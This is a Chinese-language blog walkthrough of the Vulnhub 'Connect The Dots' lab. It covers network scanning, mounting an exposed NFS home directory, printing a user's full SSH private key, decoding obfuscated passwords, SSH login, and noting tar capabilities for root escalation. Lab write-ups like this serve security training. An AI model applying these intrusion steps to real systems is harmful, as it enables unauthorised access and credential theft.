Vulnhub之Connect The Dots靶机详细测试过程

Connect The Dots

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:3c:b6:46      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.254  08:00:27:73:75:f9      1      60  PCS Systemtechnik GmbH                  

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-08 23:18 EDT
Nmap scan report for deathnote.vuln (192.168.56.254)
Host is up (0.00025s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 2.0.8 or later
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Landing Page
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34417/tcp   mountd
|   100005  1,2,3      36033/tcp6  mountd
|   100005  1,2,3      57053/udp   mountd
|   100005  1,2,3      57695/udp6  mountd
|   100021  1,3,4      32979/tcp   nlockmgr
|   100021  1,3,4      42415/udp6  nlockmgr
|   100021  1,3,4      43151/udp   nlockmgr
|   100021  1,3,4      45629/tcp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
7822/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 384fe876b4b704650976dd234eb569ed (RSA)
|   256 acd2a60f4b4177df06f011d592399feb (ECDSA)
|_  256 93f7786fcce8d48d754bc2bc134bf0dd (ED25519)
32979/tcp open  nlockmgr 1-4 (RPC #100021)
34417/tcp open  mountd   1-3 (RPC #100005)
34421/tcp open  mountd   1-3 (RPC #100005)
39227/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:73:75:F9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ showmount -e 192.168.56.254                                
Export list for 192.168.56.254:
/home/morris *
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ mkdir sharedata                                            
                                                                                                                                                             

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ sudo mount -t nfs 192.168.56.254:/home/morris sharedata
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ cd sharedata       
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots/sharedata]
└─$ ls -alh
total 56K
drwxr-xr-x  8 kali kali 4.0K Oct 11  2019 .
drwxr-xr-x  3 kali kali 4.0K Jun  8 23:19 ..
-rw-------  1 kali kali    1 Oct 11  2019 .bash_history
-rw-r--r--  1 kali kali  220 Oct 10  2019 .bash_logout
-rw-r--r--  1 kali kali 3.5K Oct 10  2019 .bashrc
drwx------  9 kali kali 4.0K Oct 10  2019 .cache
drwx------ 10 kali kali 4.0K Oct 11  2019 .config
drwx------  3 kali kali 4.0K Oct 10  2019 .gnupg
-rw-------  1 kali kali 1.9K Oct 11  2019 .ICEauthority
drwx------  3 kali kali 4.0K Oct 10  2019 .local
-rw-r--r--  1 kali kali  807 Oct 10  2019 .profile
drwx------  2 kali kali 4.0K Oct 10  2019 .ssh
drwxr-xr-x  2 kali kali 4.0K Oct 10  2019 Templates
-rw-------  1 kali kali   52 Oct 10  2019 .Xauthority
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots/sharedata]
└─$ cd .ssh     
                                                                                                                                                             
┌──(kali㉿kali)-[~/…/Vulnhub/Connect_the_dots/sharedata/.ssh]
└─$ ls -alh
total 16K
drwx------ 2 kali kali 4.0K Oct 10  2019 .
drwxr-xr-x 8 kali kali 4.0K Oct 11  2019 ..
-rw------- 1 kali kali 1.8K Oct 11  2019 id_rsa
-rw-r--r-- 1 kali kali  395 Oct 11  2019 id_rsa.pub
                                                                                                                                                             
┌──(kali㉿kali)-[~/…/Vulnhub/Connect_the_dots/sharedata/.ssh]
└─$ cat id_rsa                                             
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEArk8CQ4/wfxbRkZExIsKaKudv417Wngdv0ePocrwKOhblnhr5fnb5
IAZAOXS+uO1CV8eg1E4fsZGUmr/QSjnkqWdqnFD/JTH/h/Y+SwobvxOQe3WRFAyQJvEM8C
SSCAxoVaKnclVS+JFPLzs3YCx48Y/VUbKByArrpuv0hw3UxlHEFdXxYGJWa6zXFXlmbRLn
Tej1xfCa45hnC5YlSka57bnAnv6rk+xzBznLJ2Q2srpnyivz/6fNuWb5x7Rz2s4IeNUpi2
4JbTs/ldTQWKxjT8K62YGcNpSrg1RMVvrUcuUK/bfdikuyRBNuturzXBvQ0aTQ7fYkTFgH
6Bn5aCfTXwAAA8gsPQrlLD0K5QAAAAdzc2gtcnNhAAABAQCuTwJDj/B/FtGRkTEiwpoq52
/jXtaeB2/R4+hyvAo6FuWeGvl+dvkgBkA5dL647UJXx6DUTh+xkZSav9BKOeSpZ2qcUP8l
Mf+H9j5LChu/E5B7dZEUDJAm8QzwJJIIDGhVoqdyVVL4kU8vOzdgLHjxj9VRsoHICuum6/
SHDdTGUcQV1fFgYlZrrNcVeWZtEudN6PXF8JrjmGcLliVKRrntucCe/quT7HMHOcsnZDay
umfKK/P/p825ZvnHtHPazgh41SmLbgltOz+V1NBYrGNPwrrZgZw2lKuDVExW+tRy5Qr9t9
2KS7JEE2626vNcG9DRpNDt9iRMWAfoGfloJ9NfAAAAAwEAAQAAAQB51d/POZzwOBLjnIir
sznvIzWhx3hbnPcbziF7kNPVJov4pwIc0yvupm/duSxWNgBZOr+/pZuhkhA82jXMrAqYHi
D2gebVKM1jS0rfSIF8XUBwCw0M5nsbvQE+GVG5LnL+6GICGIGWHHssmEdsgalHrzF7mTn9
iSSN1/9jJtfChdxnHYSOa6hbmjXOkQ3rCJ6xJCYOQ7Oh/KsGbOqzErKAFpv22MD1OQ9xM3
Q+bm7QeHRMyXeM03z4yhty2VnrqcJGWFzUCtod3YigXITC18XfFmJ4sy4IFvYdJ/3lD7El
1hNisOWmSs5M/FXXZXS8u+ISXaKeTbN1l7PhC9S8wSaBAAAAgF7o7I23cGWx5zBYcxTjJv
SOOkgolM/Ki9/fM/MDAcOGeN2MbY+bgyxVWLSWLPx7ZqhS3+eyCV5aerHkC7jPZfTxNjcW
hJuJ4HSEu+BsXGCOutZUCeG9C4tAlWgIKttoc9jW7sgnfus7a0bUZxhmDNWGwf/KcChh5l
p57d8SFJb/AAAAgQDjAiuzQ6hmjVuJ/lTtDQRJDQM24qutH1K93cIoit3oDyotQukaVL8A
T9Lv+bVEAWM2qClga2+I/MxFtepZi/vdHtZR7afhD8qWUDEm32wnUeBDch0KOKjojjhBEw
Ay0LCibdgQpYtR0fAVsWaJXJmgkb7wL7KMd+tLld2e3cDdXQAAAIEAxJHdrnE5UWGoBwcw
HjEqjR7QVbhiVhWM2m4p6RN5xx+x2CKnATUyQCN9iZ6w7jpgMkQXHjqm6V+pKkudgHuwBh
BvfVNWIPvu4Z3GgYIIeqJuqcAm7K/VD0vatUNd2WYTin3JwdrpwEHLKsWzM1oscc1Ec/If
uiW7R6xHrWHGK+sAAAANbW9ycmlzQHNpcnJvbQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----


拷贝私钥文件内容,创建为私钥文件

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ ssh -i id_rsa morris@192.168.56.254 -p 7822
morris@192.168.56.254's password: 
Permission denied, please try again.
morris@192.168.56.254's password: 


但是并不能连接成功。需要继续收集更多信息:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ nikto -h http://192.168.56.254
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-06-08 23:29:18 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.htm, /index.html.
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 7ac, size: 59494509b9f00, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /hits.txt: This might be interesting.
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-06-08 23:29:47 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ curl http://192.168.56.254/hits.txt  
Remember! Keep your enumeration game strong!        
──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.bak,.txt,.js,.sh          
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,bak,txt,js,sh
[+] Timeout:                 10s
===============================================================
2023/06/08 23:30:50 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1964]
/.html                (Status: 403) [Size: 294]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.254/images/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.254/manual/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.254/javascript/]
/hits.txt             (Status: 200) [Size: 44]
/backups              (Status: 200) [Size: 6301]
/backups.html         (Status: 200) [Size: 325]
/mysite               (Status: 301) [Size: 317] [--> http://192.168.56.254/mysite/]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]

发现了/mysite目录,存在用户登录页面,但是经过检查页面源代码,这并不是真正的登录页面。

在/mysite目录下有个bootstrap.min.cs文件很可疑,因为不是css,而是cs

然后在浏览器console中console.log(b1+b2+b3+b4+b5+b6+b7+b8+b9+10)得到jsfuck编码后的数据,用在线网站解码:

http://codertab.com/JsUnFuck

得到:

TryToGuessThisNorris@2k19

因此猜测用户名为norris,密码为TryToGuessThisNorris@2k19

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ ssh norris@192.168.56.254 -p 7822
norris@192.168.56.254's password: 
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

###
   #     #    #     #     #####     #      ##     #####     #    #    #   ####
   #     ##   #     #       #       #     #  #      #       #    ##   #  #    #
   #     # #  #     #       #       #    #    #     #       #    # #  #  #
   #     #  # #     #       #       #    ######     #       #    #  # #  #  ###
   #     #   ##     #       #       #    #    #     #       #    #   ##  #    #
  ###    #    #     #       #       #    #    #     #       #    #    #   ####

norris@sirrom:~$ id
uid=1001(norris) gid=1001(norris) groups=1001(norris),27(sudo)
norris@sirrom:~$ ls -alh
total 40K
drwxr-xr-x 5 norris norris  4.0K Jun  9 09:36 .
drwxr-xr-x 4 root   root    4.0K Oct 11  2019 ..
-r-------- 1 norris norris     1 Oct 11  2019 .bash_history
-rw-r--r-- 1 norris norris   220 Oct 11  2019 .bash_logout
-rw-r--r-- 1 norris norris  3.5K Oct 11  2019 .bashrc
dr-xr-xr-x 3 nobody nogroup 4.0K Oct 11  2019 ftp
drwx------ 3 norris norris  4.0K Jun  9 09:36 .gnupg
drwxr-xr-x 3 norris norris  4.0K Oct 11  2019 .local
-rw-r--r-- 1 norris norris   807 Oct 11  2019 .profile
-r-------- 1 norris norris    33 Oct 11  2019 user.txt
norris@sirrom:~$ cat user.txt
2c2836a138c0e7f7529aa0764a6414d0
norris@sirrom:~$ 

提权

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ wget http://192.168.56.254:8000/game.jpg.bak  
--2023-06-09 01:56:22--  http://192.168.56.254:8000/game.jpg.bak
Connecting to 192.168.56.254:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39610 (39K) [application/x-trash]
Saving to: ‘game.jpg.bak’

game.jpg.bak                            100%[============================================================================>]  38.68K  --.-KB/s    in 0s      

2023-06-09 01:56:22 (141 MB/s) - ‘game.jpg.bak’ saved [39610/39610]

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ exiftool game.jpg.bak  
ExifTool Version Number         : 12.57
File Name                       : game.jpg.bak
Directory                       : .
File Size                       : 40 kB
File Modification Date/Time     : 2019:10:10 16:46:38-04:00
File Access Date/Time           : 2023:06:09 01:56:22-04:00
File Inode Change Date/Time     : 2023:06:09 01:56:22-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 192
Y Resolution                    : 192
Exif Byte Order                 : Big-endian (Motorola, MM)
Orientation                     : Horizontal (normal)
Comment                         : .... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-
Image Width                     : 712
Image Height                    : 350
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 712x350
Megapixels                      : 0.249
                                                                        

game.jpg.bak图片元数据中有摩斯编码数据:用cyberchef网站解码:

I FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE+

提示有个secretfile

norris@sirrom:/var/www/html$ ls -alh
total 368K
drwxr-xr-x 4 root     root     4.0K Oct 11  2019 .
drwxr-xr-x 3 root     root     4.0K Oct 11  2019 ..
-rw-r--r-- 1 www-data www-data 6.2K Oct 11  2019 backups
-rw-r--r-- 1 www-data www-data  325 Oct 11  2019 backups.html
-rw-r--r-- 1 www-data www-data  77K Oct 10  2019 bootstrap.bundle.min.js
-rw-r--r-- 1 www-data www-data 153K Oct 10  2019 bootstrap.min.css
-rw-r--r-- 1 www-data www-data   44 Oct 11  2019 hits.txt
drwxr-xr-x 2 www-data www-data 4.0K Oct 11  2019 images
-rw-r--r-- 1 www-data www-data 2.2K Oct 11  2019 index.htm
-rw-r--r-- 1 www-data www-data 2.0K Oct 11  2019 index.html
-rw-r--r-- 1 www-data www-data  70K Oct 10  2019 jquery.slim.min.js
-rw-r--r-- 1 www-data www-data  879 Oct 11  2019 landing.css
drwxr-xr-x 2 www-data www-data 4.0K Oct 11  2019 mysite
-rw-r--r-- 1 www-data www-data   99 Oct 11  2019 secretfile
-rw------- 1 www-data www-data  12K Oct 11  2019 .secretfile.swp
norris@sirrom:/var/www/html$ cat secretfile 
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.

将.secretfile.swp下载到kali linux,直接用浏览器下载该文件,否则没有权限:

                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Connect_the_dots]
└─$ strings secretfile.swp                     
b0VIM 8.1
root
sirrom
/var/www/html/secretfile
U3210
#"! 
blehguessme090 
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..

经过测试该密码为morris的密码,并非root

norris@sirrom:/var/www/html$ su - root
Password: 
su: Authentication failure
norris@sirrom:/var/www/html$ su - morris
Password: 
morris@sirrom:~$ id
uid=1000(morris) gid=1000(morris) groups=1000(morris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),117(lpadmin),118(scanner)
morris@sirrom:~$ 

运行linpeas.sh脚本:

Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep

可以利用tar命令提权


posted @ 2023-06-09 14:14  Jason_huawen  阅读(217)  评论(0编辑  收藏  举报